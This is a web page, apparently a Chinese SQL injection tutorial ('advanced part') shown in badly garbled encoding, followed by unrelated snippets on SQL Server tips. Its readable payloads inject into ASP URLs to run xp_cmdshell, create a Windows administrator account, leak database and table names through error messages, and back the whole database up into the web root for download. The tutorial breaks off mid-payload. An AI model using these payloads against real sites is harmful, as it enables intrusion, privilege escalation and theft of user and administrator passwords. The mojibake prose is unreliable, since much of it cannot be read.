SQL×¢Èë©¶´È«½Ó´¥
¿´ÍêÈëÃÅÆªºÍ½ø½×ƪºó£¬ÉÔ¼ÓÁ·Ï°£¬ÆÆ½âÒ»°ãµÄÍøÕ¾ÊÇûÎÊÌâÁË¡£µ«Èç¹ûÅöµ½±íÃûÁÐÃû²Â²»µ½£¬»ò³ÌÐò×÷Õß¹ýÂËÁËÒ»Ð©ÌØÊâ×Ö·û£¬ÔõôÌá¸ß×¢ÈëµÄ³É¹¦ÂÊ£¿ÔõôÑùÌá¸ß²Â½âЧÂÊ£¿Çë´ó¼Ò½Ó×ÅÍùÏ¿´¸ß¼¶Æª¡£
µÚÒ»½Ú¡¢ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â
SQLServerÊÇÒ»¸ö¹¦ÄÜÇ¿´óµÄÊý¾Ý¿âϵͳ£¬Óë²Ù×÷ϵͳҲÓнôÃܵÄÁªÏµ£¬Õâ¸ø¿ª·¢Õß´øÀ´Á˺ܴóµÄ·½±ã£¬µ«ÁíÒ»·½Ã棬ҲΪעÈëÕßÌṩÁËÒ»¸öÌø°å£¬ÎÒÃÇÏÈÀ´¿´¿´¼¸¸ö¾ßÌåµÄÀý×Ó£º
¢Ù http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
¡¡¡¡·ÖºÅ;ÔÚSQLServerÖбíʾ¸ô¿ªÇ°ºóÁ½¾äÓï¾ä£¬--±íʾºóÃæµÄÓï¾äΪעÊÍ£¬ËùÒÔ£¬Õâ¾äÓï¾äÔÚSQLServerÖн«±»·Ö³ÉÁ½¾äÖ´ÐУ¬ÏÈÊÇSelect³öID=1µÄ¼Ç¼£¬È»ºóÖ´Ðд洢¹ý³Ìxp_cmdshell£¬Õâ¸ö´æ´¢¹ý³ÌÓÃÓÚµ÷ÓÃϵͳÃüÁÓÚÊÇ£¬ÓÃnetÃüÁîн¨ÁËÓû§ÃûΪname¡¢ÃÜÂëΪpasswordµÄwindowsµÄÕʺţ¬½Ó×Å£º
¢Ú http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
¡¡¡¡½«Ð½¨µÄÕʺÅname¼ÓÈë¹ÜÀíÔ±×飬²»ÓÃÁ½·ÖÖÓ£¬ÄãÒѾÄõ½ÁËϵͳ×î¸ßȨÏÞ£¡µ±È»£¬ÕâÖÖ·½·¨Ö»ÊÊÓÃÓÚÓÃsaÁ¬½ÓÊý¾Ý¿âµÄÇé¿ö£¬·ñÔò£¬ÊÇûÓÐȨÏÞµ÷ÓÃxp_cmdshellµÄ¡£
¡¡¡¡¢Û http://Site/url.asp?id=1 ;;and db_name()>0
Ç°ÃæÓиöÀàËÆµÄÀý×Óand user>0£¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name()ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£
¢Ü http://Site/url.asp?id=1;backup database Êý¾Ý¿âÃû to disk=’c:\inetpub\wwwroot\1.db’;--
ÕâÊÇÏ൱ºÝµÄÒ»ÕУ¬´Ó¢ÛÄõ½µÄÊý¾Ý¿âÃû£¬¼ÓÉÏijЩIIS³ö´í±©Â¶³öµÄ¾ø¶Ô·¾¶£¬½«Êý¾Ý¿â±¸·Ýµ½WebĿ¼ÏÂÃæ£¬ÔÙÓÃHTTP°ÑÕû¸öÊý¾Ý¿â¾ÍÍêÍêÕûÕûµÄÏÂÔØ»ØÀ´£¬ËùÓеĹÜÀíÔ±¼°Óû§ÃÜÂë¶¼Ò»ÀÀÎÞÒÅ£¡ÔÚ²»ÖªµÀ¾ø¶Ô·¾¶µÄʱºò£¬»¹¿ÉÒÔ±¸·Ýµ½ÍøÂçµØÖ·µÄ·½·¨£¨Èç\\202.96.xx.xx\Share\1.db£©£¬µ«³É¹¦Âʲ»¸ß¡£
¡¡¡¡¢Ý http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
Ç°ÃæËµ¹ý£¬sysobjectsÊÇSQLServerµÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬xtype=’U’ and status>0£¬±íʾÓû§½¨Á¢µÄ±íÃû£¬ÉÏÃæµÄÓï¾ä½«µÚÒ»¸ö±íÃûÈ¡³ö£¬Óë0±È½Ï´óС£¬Èñ¨´íÐÅÏ¢°Ñ±íÃû±©Â¶³öÀ´¡£µÚ¶þ¡¢µÚÈý¸ö±íÃûÔõô»ñÈ¡£¿»¹ÊÇÁô¸øÎÒÃÇ´ÏÃ÷µÄ¶ÁÕß˼¿¼°É¡£
¢Þ http://Site/url.asp?id=1 ;;and (Select Top 1 col_na
Ïà¹ØÎĵµ£º
ÕýÔÚ¼ÓÔØÊý¾Ý...
¡¡¡¡1.°´ÐÕÊϱʻÅÅÐò: select * from TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as
¡¡¡¡2.Êý¾Ý¿â¼ÓÃÜ: select encrypt(’ÔʼÃÜÂë’) select pwdencrypt(’ÔʼÃÜÂë’) select pwdcompare(’ÔʼÃÜÂë’,’¼ÓÃܺóÃÜÂë’) = 1--Ïàͬ£»·ñÔ ......
This is very common request recently – How to import CSV file into SQL Server? How to load CSV file into SQL Server Database Table? How to load comma delimited file into SQL Server? Let us see the solution in quick steps.
CSV stands for Comma Separated Values, sometimes also called Co ......
²éѯËÙ¶ÈÂýµÄÔÒòºÜ¶à£¬³£¼ûÈçϼ¸ÖÖ£º
1¡¢Ã»ÓÐË÷Òý»òÕßûÓÐÓõ½Ë÷Òý(ÕâÊDzéѯÂý×î³£¼ûµÄÎÊÌ⣬ÊdzÌÐòÉè¼ÆµÄȱÏÝ)
2¡¢I/OÍÌÍÂÁ¿Ð¡£¬ÐγÉÁËÆ¿¾±Ð§Ó¦¡£
3¡¢Ã»Óд´½¨¼ÆËãÁе¼Ö²éѯ²»ÓÅ»¯¡£
4¡¢ÄÚ´æ²»×ã
5¡¢ÍøÂçËÙ¶ÈÂý
6¡¢²éѯ³öµÄÊý¾ÝÁ¿¹ý´ó£¨¿ÉÒÔ²ÉÓöà´Î²éѯ£¬ÆäËûµÄ·½·¨½µµÍÊý¾ÝÁ¿£©
7¡¢Ëø»òÕßËÀËø(ÕâÒ²ÊDzé ......
½ñÌìÔÚµçÄÔÉϰ²×°ÁËVisual Studio 2005£¬ÀïÃæ×Ô´øÁËÒ»¸öSQL Server 2005 Express¡£°²×°Íê³ÉÖ®ºó½øÈëVS£¬Ð½¨Ò»¸öÊý¾Ý¿âÏîÄ¿£¬Ôړн¨Êý¾Ý¿âÒýÓÔһ²½Óöµ½ÁËÆæ¹ÖµÄÎÊÌâ¡£
ÔÚ·þÎñÆ÷ÃûµÄÏÂÀÁбíÀïÃæ£¬Í¨¹ýµã»÷“ˢД°´Å¥¿ÉÒÔÏÔʾµ±Ç°Í¨¹ýÍøÂç¿ÉÒÔÁ¬½Óµ½µÄÊý¾Ý¿âµÄÐÅÏ¢£¬ÆäÖÐÓÐÎÒµÄÖ÷»ú¡£È»¶ø£¬Ñ¡ÔñÁ ......
ϵͳ»·¾³£ºWindows 7
Èí¼þ»·¾³£ºVisual C++ 2008 SP1 +SQL Server 2005
±¾´ÎÄ¿µÄ£º±àдһ¸öº½¿Õ¹ÜÀíϵͳ
ÕâÊÇÊý¾Ý¿â¿Î³ÌÉè¼ÆµÄ³É¹û£¬ËäÈ»³É¼¨²»¼Ñ£¬µ«ÊÇ×÷ΪÎÒÓÃVC++ ÒÔÀ´±àдµÄ×î´ó³ÌÐò»¹ÊÇ´«µ½ÍøÉÏ£¬ÒÔ¹©²Î¿¼¡£ÓÃVC++ ×öÊý¾Ý¿âÉè¼Æ²¢²»ÈÝÒ×£¬µ«Ò²²»ÊDz»¿ÉÄÜ¡£ÒÔÏÂÊÇÎҵijÌÐò½çÃæ£¬ºóÃæ ......